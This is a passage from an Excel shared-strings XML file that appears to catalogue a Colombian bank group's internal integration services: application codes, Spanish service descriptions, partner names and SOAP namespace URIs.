    <t>DEVELOPSOATEST;DEVELOPSOATESTMQ;AW0955001;AW1277001;NU0151001</t>
  </si>
  <si>
    <t>SCI;SVP;GDE;APP;SVE</t>
  </si>
  <si>
    <t>AW1177;AW1313001;AW0638;AW1128;DataFile;Carvajal;AW1011;AW1203001;ISFID0023</t>
  </si>
  <si>
    <t>AW1285001;AW0856;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW1177;NU0034001;AW1176;AW0856;AW0638;AW1258002;AW1133;AW0659;AW1315001;AW1203001;NU0015</t>
  </si>
  <si>
    <t>CDT;NU0014001;SVE;DEVELOPSOATEST;NU0153001;NU0146001;NU0149001</t>
  </si>
  <si>
    <t>AW0937;AW0856;AW1128</t>
  </si>
  <si>
    <t>AW1285001;AW0856;AW1170;AW1287;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW1177;NU0034001;AW1128</t>
  </si>
  <si>
    <t>AW0955;NU0051001;AW0955001;AW1185001;AW1291001;AW1170;DEVELOPSOATEST;NU0034001</t>
  </si>
  <si>
    <t>APIC;AW0856;AW1071001;NU0100001</t>
  </si>
  <si>
    <t>AW1097001;ISSU20003;AW1134001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;AW1151001</t>
  </si>
  <si>
    <t>NU0010001;AW1218001;DEVELOPSOATEST;NU0150001</t>
  </si>
  <si>
    <t>AW1177;AW0937;ELIBOM;AW0856;SVP;AW1128;APP</t>
  </si>
  <si>
    <t>APIC;AW0937;AW1285001;AW1299001;AW1316001;SVP;AW1177001;AW1170;AW1287;AW1128;APP;AW1313001</t>
  </si>
  <si>
    <t>SVP;GDE;APP;AUD</t>
  </si>
  <si>
    <t>AW1078;AW1011</t>
  </si>
  <si>
    <t>NU0017001;NU0034001;AW0360004;AW0278001;AW1240001;AW1281002;NU0021001;NU0143001;SVP;NU0104001;AW1059001;AW1165;AW0453001;NU0004001;AW1128;AW1281003;AW0360006;NU0014001;APP;AW1312001;AW0955;DEVELOPSOATEST;AW1203001;NU0035001;AW1218001;NU0046001;AW1291001;NU0094001;NU0162001;AW1435001</t>
  </si>
  <si>
    <t>AW1086001;SSC;AW1287;AW1313001</t>
  </si>
  <si>
    <t>AW1177;AW0937</t>
  </si>
  <si>
    <t>AW0937;AW1148001;AW1128</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;AW1316001;NU0103001;NU0100001</t>
  </si>
  <si>
    <t>NU0100001;PRODUCTORCONSUMIDOR;NU0104001</t>
  </si>
  <si>
    <t>AW1177;NU0021001;AW1128</t>
  </si>
  <si>
    <t>CDE;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW1081001;TP</t>
  </si>
  <si>
    <t>SU2;AW0210001;SU5;SVE</t>
  </si>
  <si>
    <t>AW0499;AW0856;AW0611001</t>
  </si>
  <si>
    <t>AW0611001;AW0709001</t>
  </si>
  <si>
    <t>AW0718001;AW0550;Carvajal</t>
  </si>
  <si>
    <t>AW0937;AW0856;AW1097001;AW1156;AW1197;AW0939;DEVELOPSOATEST;AW1203001;NU0004001;AW1285001;AW1176;AW1374007;PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>AW1177;AW0922;AW1128</t>
  </si>
  <si>
    <t>AW1177;AW0748001;AW0856;SVP;AW1128;NU0034001;AW1011;AW1316;AW1218001;NU0146001;NU0149001;AW1227001;AW0623001</t>
  </si>
  <si>
    <t>AW0937;AW0718;AW1128</t>
  </si>
  <si>
    <t>AW0611002;AW0611001;AW0795;Banismo</t>
  </si>
  <si>
    <t>AW0683001;AW0563001</t>
  </si>
  <si>
    <t>SCI;CNB;ALM;SVP;GDE;SRC;APP;PSE;SVE;ATM;AUD;FAC;AW0360</t>
  </si>
  <si>
    <t>AW1177;AW1203001;AW1128</t>
  </si>
  <si>
    <t>AW1313;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>APIC;AW1176;AW1285001</t>
  </si>
  <si>
    <t>AW0611002;AW0611001;AW0795</t>
  </si>
  <si>
    <t>SVP;APP;SVE</t>
  </si>
  <si>
    <t>AW01065;PAB;TVP;AW1065;PSE</t>
  </si>
  <si>
    <t>AW01065;TVP</t>
  </si>
  <si>
    <t>AW0937;AW1285001;AW0856</t>
  </si>
  <si>
    <t>APIC;AW1285001;NU0104001;NU0170001</t>
  </si>
  <si>
    <t>AW01065;SAI;BVD;SUF;AW1078</t>
  </si>
  <si>
    <t>AW1142001;TP</t>
  </si>
  <si>
    <t>AW1142001;AW1081001</t>
  </si>
  <si>
    <t>AW0499;AW1176;AW0856;Carvajal</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0170001;AW0000852</t>
  </si>
  <si>
    <t>SCI;SVP;GDE;AW01010;AUD</t>
  </si>
  <si>
    <t>BDT;AW1165;APICONNECT</t>
  </si>
  <si>
    <t>SVE;NU0004001;DEVELOPSOATEST;NU0166001</t>
  </si>
  <si>
    <t>SAI;PAC;SCI;CNB;ALM;SVP;ALL;GDE;APP;PSE;SVE;ATM;AUD;FAC;AW0360</t>
  </si>
  <si>
    <t>AW1170;AW0955;AW0955001</t>
  </si>
  <si>
    <t>AW01065;SUF;AFC;NU0001;AW1078;AW1110001</t>
  </si>
  <si>
    <t>SCI;AW0709001;AW01010</t>
  </si>
  <si>
    <t>AW0922;AW0856;AW0998;NU0142001</t>
  </si>
  <si>
    <t>AW0718001;AW0611001;AW0709001;AW0683001;AW0628001</t>
  </si>
  <si>
    <t>AW1177;AW0937;SAI;SU2;AW0856;PAC;SCI;CNB;AW0210001;ALM;SVP;ALL;AW0611001;GDE;AW0709001;CDE;AW1128;AW01010;APP;PSE;AW1011;SVE;ATM;AUD;FAC;AW0360</t>
  </si>
  <si>
    <t>AW1177;AW0937;ELIBOM;SU2;AW0856;AW1294001;AW1097001;AW0210001;SVP;GDE;AW1287001;AW1287;AW1078;AW1128;APP;AW1011;AW1204001;SVE;AW0939001;AW0360009;AW1108001;AW1165;AW1203001;AW1272001;AW1285001;AW1302001;NU0004001;TVP;AW1249;AW0638;AW1258002;APIC;AW1312001;CDT</t>
  </si>
  <si>
    <t>AW0718001;AW0683001;AW0227001;AW0628001</t>
  </si>
  <si>
    <t>AW1177;AW0922;AW0856;AW1182;AW0611001;AW1128;AW0659</t>
  </si>
  <si>
    <t>AW0718001;AW0227001</t>
  </si>
  <si>
    <t>AW0718001;AW0504001;AW0227001;AW0628001;AW0682001</t>
  </si>
  <si>
    <t>APIC;AW0718001;AW0227001</t>
  </si>
  <si>
    <t>AW1189001;NU0019001;NU0103001</t>
  </si>
  <si>
    <t>NU0021001;DEVELOPSOATEST;AW1151001;NU0084001</t>
  </si>
  <si>
    <t>AW0611001;AW611001</t>
  </si>
  <si>
    <t>AW01065;SU2;SUF;ALM;NU0001;AW1078;AW1110001</t>
  </si>
  <si>
    <t>AW0638;AW1269001;AW1170</t>
  </si>
  <si>
    <t>AW0000852;AW1373;NU0010001;AW1365;AW0000125;PRODUCTORCONSUMIDOR;NU0094001;NU0166001;AW0360006;ISRDI001;AW0955001;AW1435001;AW1300001;AW1404002;AW1277001</t>
  </si>
  <si>
    <t>AW1276001;APIC;AW1185001;AW0360010</t>
  </si>
  <si>
    <t>AW0709001;AW01010</t>
  </si>
  <si>
    <t>AW1189001;BIM</t>
  </si>
  <si>
    <t xml:space="preserve">Permite conocer la disponibilidad del banco para hacer la negociación de divisas, acceder a las condiciones que ofrece el banco para efectuarla y consultar la historia de negociaciones realizadas entre el banco y el cliente._x000D_ </t>
  </si>
  <si>
    <t xml:space="preserve">El Certificado de Depósito a Término (CDT), es un título valor en el cual el inversionista nos deposita su dinero a un plazo, a una tasa y a una forma de pago determinada, información que será recibida por el servicio de ActivarCDT_x000D_ </t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite el registro de transacciones en ITC (Información Transaccional de Clientes). Las transacciones reportadas a través de este servicio se verán reflejadas en los archivos consolidados de ITC un día después de la aplicación de la transacción._x000D_ </t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en AFC, relacionados con la transaccionalidad de Cuentas de Ahorro para el Fomento a la Construcción:_x000D_ _x000D_ - grabarPate _x000D_ - debitarCuenta</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en Bankvision, relacionados con la transaccionalidad de Cuentas de Ahorro/Corrientes:_x000D_ _x000D_ - acreditarCuenta_x000D_ - debitarCuenta_x000D_ - anularCredito_x000D_ - anularDebito_x000D_ - transferirFondosEntreCuentas_x000D_ - anularTransferenciaFondosEntreCuentas_x000D_ </t>
  </si>
  <si>
    <t xml:space="preserve">Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID_x000D_ </t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio requerido en el Broker es una virtualización de operaciones que se van a exponer, ya sea en Bankvision (BV) o a futuro en cualquier otro aplicativo de productos del tipo depósitos, relacionadas con la consulta de Cuentas de Ahorro y Corrientes._x000D_ Este servicio cuando es consumido, devuelve la información detallada de una cuenta de ahorro o corriente, como por ejemplo, saldos disponibles, estado de la cuenta, numero de cotitulares de la cuenta, entre otra información detallada que se usa diariamente.</t>
  </si>
  <si>
    <t xml:space="preserve">Nos permite realizar la consulta de los archivos tanto Enviados como Recibidos (ejemplo: Novedades, Cobro, Facturación y Anulación, etc.), inicialmente de los pagos realizados por un cliente a través de los diferentes canales de un convenio. _x000D_ _x000D_ Y además para proporcionar al cliente una asesoría completa de sus movimientos._x000D_ </t>
  </si>
  <si>
    <t xml:space="preserve"> Servicio que permite realizar las diferentes consultas de la información de tarjetas de crédito, donde se podrá retornar información de campos de estados, saldos, deudas y fechas de la tarjeta que se pueden exponer a nivel de los clientes._x000D_ _x000D_ Este servicio está construido para poder brindar servicios de consulta de información de las tarjetas de crédito a los clientes; esto en el contexto funcional de la línea de negocio de Tarjetas (Producto de Bancolombia).</t>
  </si>
  <si>
    <t>El servicio Consulta Metadata Documental permitirá a los consumidores realizar consultas, para determinar la existencia o no de documentos al interior del grupo Bancolombia y así evitar, solicitarles a los clientes estos documentos._x000D_ El servicio está pensado para mostrarle a los consumidores información relevante sobre los documentos tales como: tipo del documento, subtipo del documento, dueño del documento, fecha de indexación del documento entre otros, adicionalmente permite elegir la opción de visualizar o no un link donde los documentos consultados pueden ser descargados, este servicio devuelve 0 o muchos documentos de acuerdo a los filtros que se realicen sobre este.</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio Consulta Movimientos Tarjeta de Crédito tiene como objetivo realizar las consultas de los Movimientos de las tarjetas de crédito de un cliente de una manera histórica y los últimos 3 días._x000D_ _x000D_ El servicio permitirá consultar por el número de la tarjeta de crédito de forma completa, y con los últimos 4 dígitos de la Tarjeta de crédito en el caso de que por seguridad se deba utilizar.</t>
  </si>
  <si>
    <t>El servicio consulta tarjetas del cliente, traerá todas las tarjetas activas que tiene el cliente (Debito, crédito y virtuales), con las condiciones propias del canal de Billetera Móvil._x000D_ Nota:  Este servicio lo expone un servidor de  Canal Billetera y se expone en IIB10</t>
  </si>
  <si>
    <t xml:space="preserve">Permite consultar la información de los cheques consignados en la cuenta especificada por el cliente, cuentas pertenecientes a cuenta de ahorros o cuenta corriente pertenecientes a Filiales de Exterior._x000D_ </t>
  </si>
  <si>
    <t xml:space="preserve">Realizar el envió del código de Seguridad al cliente, a través del componente de alertas._x000D_ </t>
  </si>
  <si>
    <t xml:space="preserve"> Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID._x000D_ _x000D_ El alcance del servicio GenerarOTP, comprende la especificación del modelo de servicio requerido para el funcionamiento de la capacidad de negocio de Generación y Asignación de tokens a los clientes con el segundo factor de autenticación vía OTP._x000D_ _x000D_ El servicio ya existe en su versión 1.1 con la operación generarOTPODA, en esta nueva versión 2 se cambiará la firma para que sea el consumidor quien envíe el sharedkey del cliente y no el servicio quien lo asigne programáticamente._x000D_ Adicionalmente se agrega la operación generarEnviarOTPODA que habilitará no solo la generación del OTP sino también su envío a través del componente de alertas y notificaciones del banco, permitiendo así a los consumidores finales no tener que hacer dos llamados independientes para generar y luego enviar el OTP.</t>
  </si>
  <si>
    <t>La creación y/o actualización de un usuario en el DA host to Host para la unidad Organizativa de Sufi en la cual van a estar matriculados  los vendedores de los comercios afiliados y usuarios internos que harán uso de la aplicación ConSufi,  El registro de dicho usuario en la aplicación responsable de la gestión de contraseñas – Biovoz, esto es la creación y/actualización._x000D_ _x000D_ El envío del token al usuario para que efectúe el enrolamiento de la voz._x000D_ _x000D_ Para ello hará uso de los servicios GestionUsuarioDA, RegistroUsuarioValidacionBiometrica y EnviarNotificacion.</t>
  </si>
  <si>
    <t>Servicio que permite pagar facturas inscritas debitando el dinero de la cuenta, realiza la afectación en tiempo real del saldo del cliente. Adicionalmente permite actualizar el valor a pagar de la factura si esta no tiene validación de base de datos._x000D_ Verifica la pertenencia de la cuenta, adicionalmente también permite validar y actualizar de ser necesario la personalización de topes, límites de pagos a terceros, límites de transferencias.</t>
  </si>
  <si>
    <t>El servicio Verificación Código Autorización permite a los consumidores hacer la validación del código de autorización retornado en el proceso de autenticación de un cliente, para garantizar el acceso a diferentes funcionalidades. _x000D_ Actualmente Implementado en IIB10</t>
  </si>
  <si>
    <t>BiometriaDactilarCifrarDatos</t>
  </si>
  <si>
    <t>AW1177_VinculacionDigitalSucursales;AW0611001 -SAP CRM Ventas Vinculació</t>
  </si>
  <si>
    <t>BiometriaDactilarDeCifrarDatos</t>
  </si>
  <si>
    <t>AW1177_VinculacionDigitalSucursales;AW0611001 -SAP CRM Ventas Vinculación</t>
  </si>
  <si>
    <t>Ahorroalamano</t>
  </si>
  <si>
    <t>1.0</t>
  </si>
  <si>
    <t>MDP</t>
  </si>
  <si>
    <t>CCT</t>
  </si>
  <si>
    <t>CMAToken</t>
  </si>
  <si>
    <t>Confronta</t>
  </si>
  <si>
    <t>ConsultarToken</t>
  </si>
  <si>
    <t>Domina</t>
  </si>
  <si>
    <t>Experto</t>
  </si>
  <si>
    <t>GAFISMarcaciones</t>
  </si>
  <si>
    <t>GoogleRecaptcha</t>
  </si>
  <si>
    <t>Metro</t>
  </si>
  <si>
    <t>NotificacionNequi</t>
  </si>
  <si>
    <t>NotificacionNovedadMesaAyudaTelePerformance</t>
  </si>
  <si>
    <t>OauthPuntosColombia</t>
  </si>
  <si>
    <t>ProgramaciondeTransacciones</t>
  </si>
  <si>
    <t>PSEValores</t>
  </si>
  <si>
    <t>RealizarOperacionFiduciaria</t>
  </si>
  <si>
    <t>RecuperarCuentasDeposito</t>
  </si>
  <si>
    <t>RemesasMoneyGram</t>
  </si>
  <si>
    <t>RoboAdvisor</t>
  </si>
  <si>
    <t>Series2</t>
  </si>
  <si>
    <t>SimpleCustomerAuthentication</t>
  </si>
  <si>
    <t>SincronizadorServidorV2.0</t>
  </si>
  <si>
    <t>SinctronizadorServidor</t>
  </si>
  <si>
    <t>TODO1</t>
  </si>
  <si>
    <t>ValidacionPrimeraSegundaClave</t>
  </si>
  <si>
    <t>VinculacionCuentasNequi</t>
  </si>
  <si>
    <t>VirtualizadorClienteBVC</t>
  </si>
  <si>
    <t>VirtualizadorServidorBCOL</t>
  </si>
  <si>
    <t>AdministrarFirmaDocumento</t>
  </si>
  <si>
    <t>AdquirirProductoSeguro</t>
  </si>
  <si>
    <t>EntidadAxIService</t>
  </si>
  <si>
    <t>OnlineReports_1</t>
  </si>
  <si>
    <t>QuoteLists_1</t>
  </si>
  <si>
    <t>Service</t>
  </si>
  <si>
    <t>ServicioCentralesIntService</t>
  </si>
  <si>
    <t>SincronizadorOMSService</t>
  </si>
  <si>
    <t>WSAutenticacionFuerte</t>
  </si>
  <si>
    <t>Provedores que no estan en la MAC.</t>
  </si>
  <si>
    <t>Vennko SAS</t>
  </si>
  <si>
    <t>Carvajal</t>
  </si>
  <si>
    <t>AccionFiduciaria</t>
  </si>
  <si>
    <t>Canales Digitales Empresas</t>
  </si>
  <si>
    <t>RIN_RIN_AW0467001</t>
  </si>
  <si>
    <t>Ajegroup</t>
  </si>
  <si>
    <t>Argos</t>
  </si>
  <si>
    <t>Avisor</t>
  </si>
  <si>
    <t>AztecaTelecomunicaciones</t>
  </si>
  <si>
    <t>Back Of RAdvisor</t>
  </si>
  <si>
    <t>Banca Digital Gateway Service</t>
  </si>
  <si>
    <t>BancaDigital</t>
  </si>
  <si>
    <t>Bancamia</t>
  </si>
  <si>
    <t>Bavaria</t>
  </si>
  <si>
    <t>CamaradeComerciodeBogota</t>
  </si>
  <si>
    <t>CamaradeComerciodeCali</t>
  </si>
  <si>
    <t>CarvajalBB11</t>
  </si>
  <si>
    <t>CarvajalBB12</t>
  </si>
  <si>
    <t>BB12_Notificaciones_AW0934001</t>
  </si>
  <si>
    <t>CISA</t>
  </si>
  <si>
    <t>Claro</t>
  </si>
  <si>
    <t>Comercialcard</t>
  </si>
  <si>
    <t>Compensar</t>
  </si>
  <si>
    <t>Comred-Megared</t>
  </si>
  <si>
    <t>ConexredPuntored</t>
  </si>
  <si>
    <t>Contecar</t>
  </si>
  <si>
    <t>CorporacionAutonomaValledelCauca</t>
  </si>
  <si>
    <t>Credicorp</t>
  </si>
  <si>
    <t>Cundinamarca</t>
  </si>
  <si>
    <t>DirectTV</t>
  </si>
  <si>
    <t>DistritoBarranquilla</t>
  </si>
  <si>
    <t>Efecty</t>
  </si>
  <si>
    <t>Electricaribe</t>
  </si>
  <si>
    <t>Entidad Ax IService</t>
  </si>
  <si>
    <t>EPM</t>
  </si>
  <si>
    <t>EPN</t>
  </si>
  <si>
    <t>Extern Session</t>
  </si>
  <si>
    <t>FlyPass</t>
  </si>
  <si>
    <t>FondoNacionaldelAhorro</t>
  </si>
  <si>
    <t>FullCarga</t>
  </si>
  <si>
    <t>Funds Transfer Service Service</t>
  </si>
  <si>
    <t>GestionCuentaPaypal</t>
  </si>
  <si>
    <t>GestionFacturacionElectronica</t>
  </si>
  <si>
    <t>Gestion Desarrollo</t>
  </si>
  <si>
    <t>Herbalife</t>
  </si>
  <si>
    <t>ICESI</t>
  </si>
  <si>
    <t>Interface Backoffice</t>
  </si>
  <si>
    <t>Interface Bancolombia</t>
  </si>
  <si>
    <t>Isagenix</t>
  </si>
  <si>
    <t>KonradLorenz</t>
  </si>
  <si>
    <t>LineaDirecta</t>
  </si>
  <si>
    <t>MunicipiodeFloridaBlanca</t>
  </si>
  <si>
    <t>MunicipiodeMedellin</t>
  </si>
  <si>
    <t>MunicipiodeSincelejo</t>
  </si>
  <si>
    <t>NotificacionEnvioReportePrestamo</t>
  </si>
  <si>
    <t>Nutresa</t>
  </si>
  <si>
    <t>PagosInteligentes(Dislicores)</t>
  </si>
  <si>
    <t>PayuLatam</t>
  </si>
  <si>
    <t>PlacetoPay</t>
  </si>
  <si>
    <t>Practisistemas</t>
  </si>
  <si>
    <t>Propilco</t>
  </si>
  <si>
    <t>Proteccion</t>
  </si>
  <si>
    <t>ProyectoConectadosConsultaCentrodeCostos</t>
  </si>
  <si>
    <t>APOYO_ADMINISTRATIVO_Y_FINANCIERO</t>
  </si>
  <si>
    <t>Transversales SAP</t>
  </si>
  <si>
    <t>ProyectoConectadosServiciosAsincronos</t>
  </si>
  <si>
    <t>ProyectoConectadosServiciosSincronos</t>
  </si>
  <si>
    <t>PSServicios Recaudo Service</t>
  </si>
  <si>
    <t>Quotes_1</t>
  </si>
  <si>
    <t>RecaudoenTiempoRealClienteIseries</t>
  </si>
  <si>
    <t>Recaudos RIN</t>
  </si>
  <si>
    <t>Recaudos SPRC</t>
  </si>
  <si>
    <t>RinArgos</t>
  </si>
  <si>
    <t>RINCISA</t>
  </si>
  <si>
    <t>RinServidorSociedadPortuariadeCartagena</t>
  </si>
  <si>
    <t>RinUne</t>
  </si>
  <si>
    <t>Satrack</t>
  </si>
  <si>
    <t>SegurosdelEstado</t>
  </si>
  <si>
    <t>SegurosEstadoSOAT</t>
  </si>
  <si>
    <t>Serfinco</t>
  </si>
  <si>
    <t>Servicio Centrales Int Service</t>
  </si>
  <si>
    <t>Servicio Pagos Service</t>
  </si>
  <si>
    <t>Servicio Trama Dummy</t>
  </si>
  <si>
    <t>Sincronizador OMSService</t>
  </si>
  <si>
    <t>Siscompal</t>
  </si>
  <si>
    <t>Soberana</t>
  </si>
  <si>
    <t>SociedadPortuariadeBarranquilla</t>
  </si>
  <si>
    <t>STEService</t>
  </si>
  <si>
    <t>Supernotariadoyregistro</t>
  </si>
  <si>
    <t>Telefonica(Movistar)</t>
  </si>
  <si>
    <t>Terpel</t>
  </si>
  <si>
    <t>Tigo</t>
  </si>
  <si>
    <t>Time Series_1</t>
  </si>
  <si>
    <t>Transaction Facade Service</t>
  </si>
  <si>
    <t>TransactionFacadeService</t>
  </si>
  <si>
    <t>TuCompra</t>
  </si>
  <si>
    <t>Une</t>
  </si>
  <si>
    <t>UniversidadCooperativadeColombia</t>
  </si>
  <si>
    <t>UniversidaddeIbague</t>
  </si>
  <si>
    <t>UniversidaddelaSabana</t>
  </si>
  <si>
    <t>UniversidadJaveriana</t>
  </si>
  <si>
    <t>UniversidadTecnologicadePereira</t>
  </si>
  <si>
    <t>User Management SSPService</t>
  </si>
  <si>
    <t>WSAutenticacion Fuerte</t>
  </si>
  <si>
    <t>Autenticacion y Monitoreo</t>
  </si>
  <si>
    <t>Gestion de Identidades</t>
  </si>
  <si>
    <t>Gestion Gontable y Financiero</t>
  </si>
  <si>
    <t xml:space="preserve">Integración Distribuida </t>
  </si>
  <si>
    <t>Aliados</t>
  </si>
  <si>
    <t>Asesorar y Negociar</t>
  </si>
  <si>
    <t>Servicios Electronicos</t>
  </si>
  <si>
    <t>Apoyo Admin y Reporteria Legal</t>
  </si>
  <si>
    <t>Inteligencia de Negocios</t>
  </si>
  <si>
    <t>Portales Contenido Pymes</t>
  </si>
  <si>
    <t>Robotica</t>
  </si>
  <si>
    <t>Gestion Humana y Nomina</t>
  </si>
  <si>
    <t xml:space="preserve">EUCs </t>
  </si>
  <si>
    <t>Home</t>
  </si>
  <si>
    <t>Disposit. Electronicos</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>namespace</t>
  </si>
  <si>
    <t>consumers</t>
  </si>
  <si>
    <t>EnviarRecordatorioUsuario</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/EnviarRecordatorioUsuario/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarEstadoClienteListasControl</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosApoyo/PrevencionLavadoActivos/ConsultarEstadoClienteListasControl/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0682001;AW0540001;AW0683001</t>
  </si>
  <si>
    <t>ConsultarMovimientosProducto</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/Basica/ConsultarMovimientosProducto/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0718001;AW0453</t>
  </si>
  <si>
    <t>CrearCuentaPasivo</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Productos/Cuentas/CrearCuentaPasivo/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0718001;AW0563001;AW0683001</t>
  </si>
  <si>
    <t>RecuperarDatosCliente</t>
  </si>
  <si>
    <t>2.0</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/VinculacionClientes/RecuperarDatosCliente/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW0227001;AW0718001;;AW0628001;AW0683001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/Basica/ConsultarMovimientosProducto/Enlace/V2.0</t>
  </si>
  <si>
    <t>ConsultarDetalleProducto</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/Basica/ConsultarDetalleProducto/Enlace/V1.0</t>
  </si>
  <si>
    <t>PagarTarjetaCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/PagarTarjetaCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>EjecutarTransferenciaExterna</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/EjecutarTransferenciaExterna/Enlace/V2.0</t>
  </si>
  <si>
    <t>BloquearDesbloquearUsuario</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/BloquearDesbloquearUsuario/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarCheques</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarCheques/Enlace/V1.0</t>
  </si>
  <si>
    <t>EnviarCodigoSeguridadOTP</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/EnviarCodigoSeguridadOTP/Enlace/V1.0</t>
  </si>
  <si>
    <t>BloquearPrimeraSegundaClaveSVP</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtualPersonas/BloquearPrimeraSegundaClaveSVP/Enlace/V2.0</t>
  </si>
  <si>
    <t>TransferenciasDeFondos</t>
  </si>
  <si>
    <t>http://panama.grupobancolombia.com/intf/Producto/CuentaAhorroCorriente/TransferenciasDeFondos/Enlace/V1.0</t>
  </si>
  <si>
    <t>CambiarPrimeraSegundaClaveSVP</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtualPersonas/CambiarPrimeraSegundaClaveSVP/Enlace/V2.0</t>
  </si>
  <si>
    <t>ConsultarGirosRealizados</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarGirosRealizados/Enlace/V2.0</t>
  </si>
  <si>
    <t>RecuperarProducto</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Productos/CoreBancario/RecuperarProducto/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0718001;APIC</t>
  </si>
  <si>
    <t>ConvertirMonto</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Tesoreria/PortafolioFinanciero/ConvertirMonto/Enlace/V2.0</t>
  </si>
  <si>
    <t>ContraOrdenarCheques</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ContraOrdenarCheques/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarInformacionProducto</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarInformacionProducto/Enlace/V1.0</t>
  </si>
  <si>
    <t>ModificarParticipante</t>
  </si>
  <si>
    <t>5.0</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/ModificarParticipante/Enlace/V5.0</t>
  </si>
  <si>
    <t>AW0563001;AW0683001</t>
  </si>
  <si>
    <t>ConsultarSaldosCongelados</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarSaldosCongelados/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarDetalleChequera</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarDetalleChequera/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaInformacionCuentasDepositos</t>
  </si>
  <si>
    <t>http://panama.grupobancolombia.com/intf/Producto/CuentaAhorroCorriente/ConsultaInformacionCuentasDepositos/Enlace/V2.0</t>
  </si>
  <si>
    <t>CrearUsuario</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/CrearUsuario/Enlace/V2.0</t>
  </si>
  <si>
    <t>EjecutarTransferenciaInterna</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/EjecutarTransferenciaInterna/Enlace/V1.0</t>
  </si>
  <si>
    <t>ValidarCodigoSeguridad</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ValidarCodigoSeguridad/Enlace/V1.0</t>
  </si>
  <si>
    <t>VerificarProducto</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Productos/CoreBancario/VerificarProducto/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW0227001;AW0718001</t>
  </si>
  <si>
    <t>ConsultarSaldosConsolidados</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarSaldosConsolidados/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarChequesConsignados</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarChequesConsignados/Enlace/V1.0</t>
  </si>
  <si>
    <t>http://panama.grupobancolombia.com/intf/Producto/CuentaAhorroCorriente/ConsultaInformacionCuentasDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultaInformacionCuentasPlazosFijos</t>
  </si>
  <si>
    <t>http://panama.grupobancolombia.com/intf/Producto/CuentaAhorroCorriente/ConsultaInformacionCuentasPlazosFijos/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarGirosRecibidos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarGirosRecibidos/Enlace/V1.0</t>
  </si>
  <si>
    <t>ConsultarMT</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canales/SucursalVirtual/ConsultarMT/Enlace/V2.0</t>
  </si>
  <si>
    <t>GrabarParticipante</t>
